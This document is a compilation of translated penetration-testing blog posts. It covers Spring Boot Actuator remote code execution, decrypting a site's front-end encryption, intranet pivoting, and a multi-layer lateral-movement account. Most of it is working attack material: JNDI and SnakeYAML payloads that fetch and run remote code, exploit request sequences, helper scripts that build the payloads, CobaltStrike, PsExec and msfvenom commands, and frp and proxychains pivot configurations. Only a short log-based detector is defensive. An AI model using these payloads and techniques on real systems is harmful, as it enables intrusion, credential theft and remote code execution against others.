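        scheme, _, token = value.strip().partition(" ")
        if scheme.lower() != "basic":
            continue
        decoded = base64.b64decode(token).decode("utf-8", "replace")
        user, _, password = decoded.rpartition(":")
        # A value containing ':' is split by the client into user/password;
        # return the whole string in that case so nothing is silently lost.
        return user if password == "null" else decoded
    return None


def listen_once(port: int, timeout: float = 30.0) -> Optional[str]:
    """Accept one connection, answer it so the client closes cleanly, return the leaked value."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        srv.settimeout(timeout)
        conn, _ = srv.accept()
        with conn:
            data = conn.recv(65536)
            conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")
    return extract_leaked_value(data)


# Constructed from the nc output shown above (not a new capture).
SAMPLE_REQUEST = (
    b"GET /xstream/apps/ HTTP/1.1\r\n"
    b"Accept: application/json\r\n"
    b"DiscoveryIdentity-Name: DefaultClient\r\n"
    b"Host: 10.20.24.191:2444\r\n"
    b"User-Agent: Java-EurekaClient/v1.4.11\r\n"
    b"Authorization: Basic MzgzNDY6bnVsbA==\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    print(build_env_body("PID", "10.20.24.191", 2444))
    print(extract_leaked_value(SAMPLE_REQUEST))
```

Usage: POST the string from build_env_body() to /env, call listen_once(2444), then POST anything to /refresh; the function returns the resolved property value (38346 for the sample).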
Find the relevant files:
grep -r 'server.address' -n ./
./src/main/resources/application.properties:2:server.address=127.0.0.1
./target/classes/application.properties:2:server.address=127.0.0.1
Change the properties to:
server.port=8090
server.address=0.0.0.0

# vulnerable configuration set 0: spring boot 1.0 - 1.4
# all spring boot versions 1.0 - 1.4 expose actuators by default without any parameters
# no configuration required to expose them

# safe configuration set 0: spring boot 1.0 - 1.4
#management.security.enabled=true

# vulnerable configuration set 1: spring boot 1.5+
# spring boot 1.5+ requires management.security.enabled=false to expose sensitive actuators
#management.security.enabled=false

# safe configuration set 1: spring boot 1.5+
# when 'management.security.enabled=false' but all sensitive actuators explicitly disabled
#management.security.enabled=false

# vulnerable configuration set 2: spring boot 2+
#management.endpoints.web.exposure.include=*

2. Restart
mvn spring-boot:run
or
/opt/jdk1.8.0_60//bin/java -classpath /opt/apache-maven-3.6.2/boot/plexus-classworlds-2.6.0.jar -Dclassworlds.conf=/opt/apache-maven-3.6.2/bin/m2.conf -Dmaven.home=/opt/apache-maven-3.6.2 -Dlibrary.jansi.path=/opt/apache-maven-3.6.2/lib/jansi-native -Dmaven.multiModuleProjectDirectory=/root/actuator/actuator-testbed org.codehaus.plexus.classworlds.launcher.Launcher spring-boot:run
Wait a moment:
root@kali:~/actuator/actuator-testbed# netstat -ntpl |grep 8090
tcp6 0 0 :8090 :* LISTEN 33666/java
http://10.20.24.191:8090/
http://10.20.24.191:8090/jolokia/list
The logback JMXConfigurator MBean exposes reloadByURL, which loads a logback XML configuration from a remote URL (excerpt of the /jolokia/list output):
'ch.qos.logback.classic': {
  'Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator': {
    'op': {
      'reloadByURL': {
        'args': [ { 'name': 'p1', 'type': 'java.net.URL', 'desc': '' } ],
        'ret': 'void',
        'desc': 'Operation exposed for management'
      }

3. An HTTP server hosts logback.xml and ExportObject.class. logback.xml uses insertFromJNDI so that parsing the configuration performs a JNDI lookup:
<configuration>
  <insertFromJNDI env-entry-name="rmi://10.20.24.191:1099/Exploit" as="appName" />
</configuration>

ExportObject.java (the class that the RMI reference points at; the command runs in its constructor when it is loaded):
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class ExportObject {
    public ExportObject() throws Exception {
        // Executed when the remote class is instantiated by the JNDI client
        Process var1 = Runtime.getRuntime().exec("touch /tmp/jas502n");
        InputStream var2 = var1.getInputStream();
        BufferedReader var3 = new BufferedReader(new InputStreamReader(var2));
        String var4;
        while ((var4 = var3.readLine()) != null) {
            System.out.println(var4);
        }
        var1.waitFor();
        var2.close();
        var3.close();
        var1.destroy();
    }

    public static void main(String[] var0) throws Exception {
    }
}

4. RCE trigger
Start the RMI reference server (marshalsec) that redirects lookups to the HTTP server hosting ExportObject.class:
root@kali:~/ldap_rmi# cat rmi.sh
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://10.20.24.191:8000/#ExportObject
root@kali:~/ldap_rmi# ./rmi.sh
* Opening JRMP listener on 1099
Have connection from /10.20.24.191:43878
Reading message...
Is RMI.lookup call for ExportObject 2
Sending remote classloading stub targeting http://10.20.24.191:8000/ExportObject.class
Close connection
Requesting the following URL in the browser makes the application load and parse the remote logback.xml; the server then resolves the malicious JNDI address and the remote bytecode is executed (note the !/ escaping of slashes inside the URL argument):
http://10.20.24.191:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:/!/10.20.24.191:8000!/logback.xml

5. Command execution succeeded
root@kali:/var/www/html# ls /tmp/j*
/tmp/jas502n
root@kali:/var/www/html#

III. YML RCE vulnerability
RCE by modifying the spring.cloud.bootstrap.location property of the Spring environment is the more reliable method. This property points to the external configuration to load, which is parsed as YAML (by SnakeYAML). Once it is set, any POST to /refresh triggers the vulnerability.
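The awkward part of step 4 above is the URL: Jolokia's GET-style exec API takes the operation argument as a path element, and its escaping rule treats ! as the escape character, so a / inside the argument is written !/ and a literal ! as !!. The following is an added example, not code from the original post or from the actuator-testbed project: it applies that rule to build the reloadByURL URL, checks a /jolokia/list response for the logback MBean (sample JSON constructed from the excerpt above), and emits the logback.xml with the insertFromJNDI element. The base URL, the RMI address and the HTTP server port are taken from the page; everything else is an assumption.

```python
"""Added example (not from the original post): Jolokia reloadByURL URL builder,
/jolokia/list checker and logback JNDI config generator."""
import json
from typing import Optional

LOGBACK_DOMAIN = "ch.qos.logback.classic"


def jolokia_escape(arg: str) -> str:
    """Jolokia path escaping: '!' is the escape char; '/' -> '!/', '!' -> '!!'."""
    return arg.replace("!", "!!").replace("/", "!/")


def find_reload_by_url(list_json: str) -> Optional[str]:
    """Return the full MBean name (domain:keys) exposing reloadByURL, or None.
    Accepts the whole /jolokia/list response or just its 'value' object."""
    data = json.loads(list_json)
    value = data.get("value", data)
    beans = value.get(LOGBACK_DOMAIN, {})
    for name, desc in beans.items():
        if "reloadByURL" in desc.get("op", {}):
            return f"{LOGBACK_DOMAIN}:{name}"
    return None


def reload_by_url(base: str, mbean: str, config_url: str) -> str:
    """GET-style Jolokia exec URL invoking reloadByURL(config_url) on mbean."""
    return f"{base.rstrip('/')}/jolokia/exec/{mbean}/reloadByURL/{jolokia_escape(config_url)}"


def logback_jndi_xml(jndi_url: str, as_name: str = "appName") -> str:
    """logback.xml whose insertFromJNDI element makes the parser do a JNDI lookup."""
    return (
        "<configuration>\n"
        f'  <insertFromJNDI env-entry-name="{jndi_url}" as="{as_name}" />\n'
        "</configuration>\n"
    )


# Constructed from the /jolokia/list excerpt above; not a real capture.
SAMPLE_LIST = json.dumps({
    "value": {
        LOGBACK_DOMAIN: {
            "Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator": {
                "op": {"reloadByURL": {
                    "args": [{"name": "p1", "type": "java.net.URL", "desc": ""}],
                    "ret": "void", "desc": "Operation exposed for management"}}}},
        "java.lang": {"type=Runtime": {"op": {}}},
    },
    "status": 200,
})

if __name__ == "__main__":
    mbean = find_reload_by_url(SAMPLE_LIST)
    if mbean:
        print(reload_by_url("http://10.20.24.191:8090", mbean,
                            "http://10.20.24.191:8000/logback.xml"))
        print(logback_jndi_xml("rmi://10.20.24.191:1099/Exploit"))
```

The generated URL escapes both slashes after http: as !/!/; the page's URL keeps the first one literal, which Jolokia tolerates because it only needs the argument to be unambiguous, but the documented form is the one the builder produces.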
yaml_payload.yml file content:
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.20.24.191:8000/yaml_payload.jar"]
  ]]
]

1. Building yaml_payload.jar
Code: https://github.com/artsploit/yaml-payload
AwesomeScriptEngineFactory.java (the page shows only part of the class; the remaining ScriptEngineFactory methods are stubs that return null, as in the repository):
package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    // ServiceLoader instantiates every registered factory, so the payload runs here
    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("touch /tmp/success");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    // Never called; present only so the class implements the interface
    @Override public String getEngineName() { return null; }
    @Override public String getEngineVersion() { return null; }
    @Override public List<String> getExtensions() { return null; }
    @Override public List<String> getMimeTypes() { return null; }
    @Override public List<String> getNames() { return null; }
    @Override public String getLanguageName() { return null; }
    @Override public String getLanguageVersion() { return null; }
    @Override public Object getParameter(String key) { return null; }
    @Override public String getMethodCallSyntax(String obj, String m, String... args) { return null; }
    @Override public String getOutputStatement(String toDisplay) { return null; }
    @Override public String getProgram(String... statements) { return null; }
    @Override public ScriptEngine getScriptEngine() { return null; }
}

yaml_payload.jar\artsploit\AwesomeScriptEngineFactory.class contains the actual bytecode, with the malicious payload in the constructor.
yaml_payload.jar\META-INF\services\javax.script.ScriptEngineFactory is just a text file containing the fully qualified name 'artsploit.AwesomeScriptEngineFactory', so that ServiceLoader knows which class to instantiate. Content:
artsploit.AwesomeScriptEngineFactory
The jar is hosted on the HTTP server: http://10.20.24.191:8000/yaml_payload.jar

2. Set spring.cloud.bootstrap.location
spring.cloud.bootstrap.location=http://10.20.24.191:8000/yaml_payload.yml

POST /env HTTP/1.1
Host: 10.20.24.191:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Forwarded-For: 127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

spring.cloud.bootstrap.location=http://10.20.24.191:8000/yaml_payload.yml

3. Refresh: POST any content to /refresh and the RCE is triggered

POST /refresh HTTP/1.1
Host: 10.20.24.191:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Forwarded-For: 127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

12312

4. RCE succeeded
root@kali:/var/www/html# ls /tmp/succ*
/tmp/success
root@kali:/var/www/html#
PS: compared with Eureka's XStream payload, the YAML method works even on the latest version.
Reference link: https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
Original link: https://github.com/jas502n/SpringBoot_Actuator_RCE
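All three techniques in this post leave the same trace on the wire: a POST to /env (or /actuator/env) followed shortly by a POST to /refresh from the same client, or a GET to the Jolokia reloadByURL operation. The following is an added detection example, not part of the original post: it runs that logic over constructed combined-format access-log lines. The paths and the five-minute window are assumptions; adjust them if the application uses a custom management base path.

```python
"""Added example (not from the original post): detect the /env -> /refresh
property-injection chain and Jolokia reloadByURL calls in access logs."""
import re
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Combined log format: ip ident user [time] "METHOD PATH PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
ENV_PATHS = {"/env", "/actuator/env"}
REFRESH_PATHS = {"/refresh", "/actuator/refresh"}
JOLOKIA_EXEC = "/jolokia/exec/"


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],
        "status": int(m.group("status")),
    }


def detect(lines: List[str], window_seconds: int = 300) -> List[Tuple[str, str]]:
    """Return (client_ip, reason) alerts in log order."""
    alerts: List[Tuple[str, str]] = []
    last_env_write: Dict[str, datetime] = {}
    for raw in lines:
        e = parse_line(raw)
        if e is None:
            continue
        ip, path, method = e["ip"], e["path"], e["method"]
        if method == "POST" and path in ENV_PATHS:
            # A write to the environment is suspicious on its own
            last_env_write[ip] = e["ts"]
            alerts.append((ip, f"POST {path}: environment property written"))
        elif method == "POST" and path in REFRESH_PATHS and ip in last_env_write:
            if (e["ts"] - last_env_write[ip]).total_seconds() <= window_seconds:
                alerts.append((ip, "POST /env followed by /refresh: property injection chain"))
        elif path.startswith(JOLOKIA_EXEC) and "reloadByURL" in path:
            alerts.append((ip, "Jolokia reloadByURL: remote logback configuration load"))
    return alerts


# Constructed sample lines mirroring the requests in this post; not a real log.
SAMPLE_LOG = [
    '10.20.24.50 - - [28/Oct/2022:12:22:33 +0000] "GET /env HTTP/1.1" 200 5120',
    '10.20.24.50 - - [28/Oct/2022:12:22:40 +0000] "POST /env HTTP/1.1" 200 52',
    '10.20.24.50 - - [28/Oct/2022:12:22:45 +0000] "POST /refresh HTTP/1.1" 200 3',
    '10.20.24.60 - - [28/Oct/2022:12:30:00 +0000] "POST /refresh HTTP/1.1" 200 3',
    '10.20.24.50 - - [28/Oct/2022:12:35:00 +0000] "GET /jolokia/exec/'
    'ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator'
    '/reloadByURL/http:!/!/10.20.24.191:8000!/logback.xml HTTP/1.1" 200 87',
]

if __name__ == "__main__":
    for ip, reason in detect(SAMPLE_LOG):
        print(ip, reason)
```

A lone POST /refresh (the 10.20.24.60 line) is not flagged, since /refresh is also hit by legitimate config-server reloads; the chain is what matters. The GET /env is deliberately left as reconnaissance noise rather than an alert.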
-
Title: Decrypting the front-end request and response packets, round two
That is, after the last decryption, the development team did not give up: a few months later the response packets were encrypted too, and the front-end JS was compressed and obfuscated. From observation, the initial assumption is that the server performs the same RSA+AES encryption, sending the RSA-encrypted key and IV together with the AES-encrypted data field. But for us this actually adds insult to injury and reduces the security of the system: for the front-end to decrypt RSA+AES, the RSA private key must exist in the front-end!

Start the operation
1. As before, search for the encryptIv field, find the suspected decryption routine, set a breakpoint and submit a login request. Burp captures the response packet; extract the data field. At the breakpoint, extract the AES key and IV that were decrypted with RSA. Put n and a from the front-end breakpoint into the Guigui JS debugging tool as key and IV and try to decrypt. Decryption succeeds, which means the idea is right: the code here decrypts the encryptIv and encryptKey sent by the server into the original AES key and IV.
2. Following the decryption code, find the RSA private key (p.d); it is displayed incompletely, so Ctrl+F for the complete private key and copy it. Decrypting with the jsencrypt.js script throws an error, because the original JS calls the browser's window and navigator objects, which are used to get window information and mouse position to generate random numbers. Searching around, I found that someone had already modified the original JSEncrypt to remove the window and navigator calls. Post address: https://bbs.125.la/forum.php?mod=viewthread&tid=14113049. Debugging then succeeds in Guigui JS.
3. The last step is writing the automated encryption and decryption scripts.
As before, the combination is mitmweb + Burp: the browser proxies to Burp, Burp chains to mitmweb, which runs the Python scripts, and the request is then sent to the server. The general idea is as shown (diagram omitted). In fact I thought 90% was done and the remaining 10% was writing the automation scripts. That 10% ended up taking several days, because calling the JS decryption kept failing. It was solved afterwards; broadly speaking it had to do with the AES algorithm, JS and Python. We can talk about that big pitfall in detail next issue; skip it today. Finally, the script gained code to disable the front-end decryption and code for mitmweb to decrypt the response. Debugging succeeded, Burp is comfortable again and the whole flow is clear. By the way, huh? I found a high-risk vulnerability: the verification code is returned to the front end, haha. But I am kind-hearted: since this encryption and decryption will not be solved for a while, and it is Friday, let's call development and have the vulnerability fixed next Monday. The new code is left for next time, to be discussed together with the AES pitfall.
-
Title: Series summary of common methods for intranet penetration
Preface When intranet penetration, a WebShell or CobaltStrike, Metasploit will be launched, etc. is just the beginning, and it is more about moving the intranet horizontally, expanding the results, and hitting the core area. However, the prerequisite for post-infiltration is to build an "exclusive channel" to the intranet in order to further attack. However, in actual combat, the use methods are different due to different network environments. The content of this article is expanded according to the following mind map Target outbound (socks proxy) This is the network environment that you are most willing to encounter in actual combat. The target machine can access the Internet normally and can directly hang the socks agent or CobaltStrike on the target machine to open up the target's intranet channel. frp(socks5) frp server configuration file [common]bind_port=8080 frp client configuration file [common]server_addr=xx.xx.xx.xxserver_port=8080#Service port Use common web ports [socks5]type=tcpremote_port=8088plugin=socks5use_encryption=trueuse_compression=true#socks5 password#plugin_user=SuperMan#plugin_passwd=XpO2McWe6nj3 The two functions of encryption and compression are added here, which are not enabled by default. According to the author's introduction, the compression algorithm uses snappy. use_encryption=true enable encryption [Encrypted transmission of communication content, effectively preventing traffic from being intercepted] use_compression=true Enable compression [transmitting content for compression, effectively reducing the transmitted network traffic and speeding up traffic forwarding, but it will consume some additional CPU resources] use_encryption=true , use_compression=true must be placed under the relevant protocol. 
After the frp client and configuration file are transmitted to the target machine, the program name and configuration file are modified and placed in the system-related folders to ensure concealment setg Proxies socks5:xxx.xxx.xxx.xxx.xxx:8088 Comparison of encryption compression This is the FRP client configuration file that does not use encryption and compression functions. The metaploit hangs the socks proxy is used to scan the data packets transmitted by ms17_010, which can clearly identify the specific attack behavior. If the target intranet has security equipment such as "situation awareness" and traffic analysis, it will be monitored, resulting in the loss of permissions. After using encryption and compression functions, although the attack source address will also be exposed, the transmitted data packets cannot be distinguished, avoiding the security monitoring equipment in the intranet CobaltStrike (socks4a) Go to the Beacon of the controlled target machine to enable the socks agent beacon socks 1024 #Port is set according to the actual situation of VPS View Proxy Pivots in the menu bar, connect the copy proxy to Metasploit, or directly hang socks4a in related security tools. No online machine This is the link link. As long as the main link (beacon) is disconnected, all of them will be disconnected! SMB Beacon Official introduction to SMB Beacon: SMB Beacon uses a named pipe to communicate through the parent Beacon. When two Beacons are linked, the child Beacon obtains the task from the parent Beacon and sends it. Because the linked Beacons uses Windows named pipes for communication, this traffic is encapsulated in the SMB protocol, SMB Beacon is relatively hidden. Create an SMB Listener (host and port can be ignored), pay attention to the Listener selection, and select the host-derived session that can be reached by route in the session. 
(Create SMB in Listner, right-click spawn as, select the corresponding Listener to go online) After successful operation, you can see the character ∞∞, which is the connection state of the derived SMB Beacon. You can disconnect it with the link host link or unlink host on the main Beacon. beacon link 192.168.144.155beacon unlink 192.168.144.155 Link Listener Create Listener on the online host. Export the executable file or dll corresponding to this type of Listener. Select the Listener you just created. Upload the paidload that has just been generated to the currently online target machine, and use the PsExec.exe tool here. (CobalStrike itself has psexec function not powerful enough) Use the PsExec tool in Beacon to upload the payload to the target machine that does not leave the network, execute it automatically, and go online. beacon shell C:\WINDOWS\Temp\PsExec.exe -accepteula\\192.168.144.155,192.168.144.196 -u administrator -p admin@123 -d -c C:\WINDOWS\Temp\beacon.exe beacon shell netstat -ano |findstr 4444 SSH Login beacon ssh 192.168.144.174:22 root adminbeacon ssh 192.168.144.203:22 root admin Checking the network connection status in the Linux target machine is actually a connection established with the previously launched Windows host. The target does not go out of the network (http proxy) There may be firewalls, network gates, etc. in the target machine network, which only allows http one-way outflow and cannot access the Internet normally. The above socks method is not feasible, and it can only be used to penetrate using http proxy. reGeorg (socks5) python reGeorgSocksProxy.py -u http://192.168.144.211/tunnel.aspx -l 0.0.0.0 -p 10080 Using metasploit to hang reGeorg socks proxy, scan the data packets transmitted by ms17_010, which can clearly identify attack behavior. Neo-reGeorg (encryption) python neoreg.py -k test@123 -l 0.0.0.0 -p 10081 -u http://192.168.144.211/neo-tunnel.aspx After using Neo-reGeorg, the packet has been encrypted and transmitted. 
Ice Scorpion (Behinder) with socks5 enabled
Ice Scorpion encrypts its traffic and also has a socks proxy function, but packets get lost during transmission. Here we again used metasploit through it to check for ms17_010, and the result showed the vulnerability as absent; checked without the proxy, the vulnerability actually exists. Although scanning through Ice Scorpion's proxy is not as accurate as through reGeorg, port detection with a small thread count is feasible, for example auxiliary/scanner/portscan/tcp. Accuracy is mostly decided by how many packets a given check needs and by how they are carried.

reduh (single-port forwarding)
reduh usage: https://blog.csdn.net/nzjdsds/article/details/82930774
When the versions of the target's middleware and other services are old and neither reGeorg nor the Ice Scorpion webshell can be parsed normally, you need a different HTTP proxy script. This was the environment met in one real engagement; reduh is used as the example here. Although it only forwards one specified port (so graphical connections are not practical), you can first generate a bind shell payload with msfvenom, then bring it into metasploit over the reduh single-port forward, and finally open a proxy with the socks4a module. The specific process:

sudo msfvenom --platform windows -p windows/shell_bind_tcp lport=53 -e x86/shikata_ga_nai -i 5 -f exe -o x86shell.exe
# --platform         target platform of the payload
# -e, --encoder      encoder to use
# -i, --iterations   number of encoding passes

Upload the payload to the target server and execute it. The metasploit handler points at the local end of the reduh forward (127.0.0.1:5353), which reduh maps to port 53 on the target.

sudo msfconsole -q
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/shell_bind_tcp
msf5 exploit(multi/handler) > set rhost 127.0.0.1
msf5 exploit(multi/handler) > set lport 5353
msf5 exploit(multi/handler) > run -j

java -jar reDuhClient.jar http://103.242.xx.xx/reduh.aspx
telnet 127.0.0.1 1010
[createTunnel]5353:127.0.0.1:53

You can continue the penetration inside metasploit, or start a socks4a and attach other security tools to keep going.

msf5 exploit(multi/handler) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 10080
msf5 auxiliary(server/socks4a) > run -j

Notice
Why use a shell payload instead of meterpreter? Meterpreter is a feature-rich payload that needs a large number of packets in transit, and this single-port forward is not very stable to begin with; meterpreter would make the "small water pipe" even more unstable.

Isolated networks (multi-level proxies)
In intranet penetration you will meet isolated networks, usually logically isolated. The way through is to take control of a jump host that has routes into them (multi-homed machines, ops and maintenance hosts, etc.) and build first-, second- and third-level proxies on it.

frp
Suppose you now hold a dual-NIC intranet server; you can use frp to build the channel. This server acts both as frp server and as frp client. (For details refer to https://www.cnblogs.com/PANDA-Mosen/p/13096260.html)

proxifier
Once the frp tunnel is up, add two proxies in proxifier, the external-network socks and the internal-network socks, and create a proxy chain from them (mind the proxy order). Then set the proxy rules and select the chain. The second-level proxy came up, and a probe of the host in the isolated intranet shows port 445 open.

Proxychains
The command-line proxy tool proxychains: set the second-level proxy and the socks password (mind the proxy order). Chained into metasploit for ms17_010 detection, you can watch the traffic pass through the proxy chain.

Routing inside metasploit
With metasploit, as long as the route is reachable through a session, multi-layer penetration can be done directly, which is more convenient. But if the main session drops, everything behind it drops with it! After obtaining a session on the target, view its IP segments and add routes automatically:

msf5 exploit(multi/handler) > sessions 1
meterpreter > run get_local_subnets
meterpreter > run autoroute -p
meterpreter > run post/multi/manage/autoroute
meterpreter > run autoroute -p
meterpreter > background

The above is done from inside the meterpreter session; alternatively, when the target's routing information is already known, add the route directly:

msf5 exploit(multi/handler) > route add 172.20.20.0/24 1   # 1 is the session id
msf5 exploit(multi/handler) > route

You can then keep penetrating inside metasploit, or open a socks and attach other tools for multi-layer penetration:

msf5 exploit(multi/handler) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 1080
msf5 auxiliary(server/socks4a) > run -j

Then edit /etc/proxychains.conf to point at it.
Original link: https://www.cnblogs.com/yokan/p/14057794.html
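The frp, proxifier and proxychains paragraphs above describe the two-level chain but never show the files involved. The script below is an added example, not code from the original post or from the frp project: it generates the four configuration files for a VPS-to-dual-NIC-host-to-inner-host chain and a matching proxychains.conf, and checks that the chain order is the one the text warns about. The addresses (VPS 203.0.113.10, pivot A's intranet NIC 10.10.10.5), ports, token, socks credentials and section names are all assumptions for illustration.

```bash
#!/usr/bin/env bash
# Two-level socks chain with frp plus proxychains (added example, not from the post).
# Layout assumed here:
#   attacker -> VPS (frps :7000, publishes A's socks on :1080)
#   host A   = dual-NIC pivot: frpc to the VPS AND frps bound to its intranet NIC
#   host B   = reachable only from A's 10.10.10.0/24 side: frpc to A, socks on A:1081
set -eu

VPS=203.0.113.10          # assumed attacker VPS
A_INTRANET_IP=10.10.10.5  # assumed intranet NIC of the dual-NIC pivot
TOKEN='change-me'         # assumed shared frp token; never leave it empty on a pivot

# frps.ini on the VPS. Only the pivot's frpc connects here.
frps_vps_ini() {
  cat <<EOF
[common]
bind_port = 7000
token = ${TOKEN}
EOF
}

# frpc.ini on host A: first-level socks5, exposed as VPS:1080.
frpc_a_ini() {
  cat <<EOF
[common]
server_addr = ${VPS}
server_port = 7000
token = ${TOKEN}

[socks_l1]
type = tcp
remote_port = 1080
plugin = socks5
plugin_user = l1user
plugin_passwd = l1pass
EOF
}

# frps.ini on host A as well: bound to the intranet NIC only, so B can reach it
# but nothing on A's outer interface can.
frps_a_ini() {
  cat <<EOF
[common]
bind_addr = ${A_INTRANET_IP}
bind_port = 7000
token = ${TOKEN}
EOF
}

# frpc.ini on host B: second-level socks5, exposed on A's intranet NIC as :1081.
frpc_b_ini() {
  cat <<EOF
[common]
server_addr = ${A_INTRANET_IP}
server_port = 7000
token = ${TOKEN}

[socks_l2]
type = tcp
remote_port = 1081
plugin = socks5
plugin_user = l2user
plugin_passwd = l2pass
EOF
}

# /etc/proxychains.conf on the attacker box. strict_chain keeps the listed order:
# hop 1 is the external socks on the VPS, hop 2 is A:1081, which is only reachable
# once you are already inside hop 1. Reversing the two lines breaks the chain.
proxychains_conf() {
  cat <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 ${VPS} 1080 l1user l1pass
socks5 ${A_INTRANET_IP} 1081 l2user l2pass
EOF
}

# Sanity check for a generated proxychains config: strict chain in use and the
# external hop listed first. Returns non-zero when the order is wrong.
check_chain_order() {
  conf="$1"
  printf '%s\n' "$conf" | grep -q '^strict_chain' || return 1
  first_hop=$(printf '%s\n' "$conf" | awk '/^\[ProxyList\]/{f=1;next} f&&NF{print $2; exit}')
  [ "$first_hop" = "$VPS" ]
}

# Stand-alone run: print every file with a banner saying where it belongs.
main() {
  printf '### VPS: frps.ini\n';          frps_vps_ini
  printf '\n### host A: frpc.ini\n';     frpc_a_ini
  printf '\n### host A: frps.ini\n';     frps_a_ini
  printf '\n### host B: frpc.ini\n';     frpc_b_ini
  printf '\n### attacker: /etc/proxychains.conf\n'; proxychains_conf
}
main
```

Bring the pieces up in order: frps on the VPS, then on host A both frpc (towards the VPS) and frps (on the intranet NIC), then frpc on host B. After that, `proxychains4 msfconsole` or any other tool wrapped by proxychains reaches B's side; proxifier gets the same two proxies in the same order as its chain.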
-
Title: Penetrating three layers of intranet into a workgroup intranet in one go [from 0 to 1, breaking all the intranet machines]
Preface
During an offensive and defensive drill, the team first got a webshell and then bounced the access to CobaltStrike so that I could do the intranet penetration. I found that the current machine is a public-network server with only the public IP xxx.xxx.xxx.16. By looking at the ARP cache I found that there are currently some public-network machines; querying these IPs showed that they belong to one network, and with nbtscan I found that the current C segment has live hosts. (I initially judged that the machines in this C segment might have a domain, but was not sure.)

Lateral movement across the first layer of intranet, the current machine's C segment
Since this is an offensive and defensive drill, the more points the better, so I did not consider some other issues here. After getting the current machine I grabbed the plaintext password; however, when I used MSF to spray this password across the C segment, no host was taken laterally. So I scanned again to see whether there was any MS17010 (generally speaking, this kind of 'Xiang.com' basically has several EternalBlue hosts, so just scan). I found that the three hosts 92, 151 and 200 had MS17010, and then hit host 92. Then I linked MSF and CS, popped the MSF shell over to CS and maintained access. At this point these two springboard machines are enough; there is no need to keep hitting the other two MS17010 hosts.

Then I gathered information on the current C segment, scanned for live web assets and found a large number of them. Through manual analysis I found a SQL injection, and it had DBA privileges. I then added an administrator user and turned on 3389 (because of Norton, I had no time for regular AV evasion, and the main goal was points, so I simply logged in to the server directly). I could not connect directly through socks, which felt like a restriction; later I found that logging in with mstsc /admin works. So I used host 92 as a springboard to log in remotely to the desktop of host 71. The administrator's desktop was cloned. Then I logged in with the previously added account through remote desktop, and it is the administrator's desktop. Through a series of information gathering and password collection I obtained the MSSQL credentials and all the side sites. With the collected passwords I continued spraying the C segment successfully. MSSQL: xxx.xxx.xxx.239. I then called xp_cmdshell directly to execute commands and found the privileges were still very high, and used bitsadmin to bring it online in CS. At this point I had the three machines 16, 92 and 239, but had still not found the intranet, and I hit a bottleneck. Having got this far I found it was impossible to move laterally any further, and I did not want to use a 0day to hit the other webs.

I turned around and used MS17010 to hit host 200. Then, in the same way, the shell was popped to CS, a user was added and put in the remote desktop group. Login failed; using mstsc /admin bypassed that and logged in to the target's remote desktop successfully. The administrator's desktop was cloned in the same way. I found a lot of valuable things, such as the mstsc login records, the Navicat database credentials, and many SSH sessions in Xshell: all the Linux hosts could be logged in. At this point you only need SharpDecryptPwd to grab their passwords, but I ran into a problem. Later I used this tool to check the passwords (I did not want to use these things, checking the passwords one by one is too troublesome). I found several machines on the 10.x intranet. I sprayed the existing password across the Linux hosts in the C segment and popped a few shells to MSF. So far the C segment of this public network has basically been penetrated, and a large number of core databases, switches and web servers have been taken down. The next step is penetration of the 10.x intranet.

Intranet penetration from the second layer, the 10 segment
Because I had obtained the root password, I directly scanned the B segment 10.10.10.1/16. There was a large wave of assets; I will not screenshot them here, there are hundreds, and I found ESXi, and got hold of an access control system. I took down two SSH hosts on the 10 segment laterally by special means and found that the third layer of intranet is the 192 segment plus a docker environment. Since there is ESXi on the 10 segment, I used the vulnerability directly to get the ESXi platform, and all of its machines fell. At this point the 10 segment has basically been penetrated, and the next step is the 192 intranet.

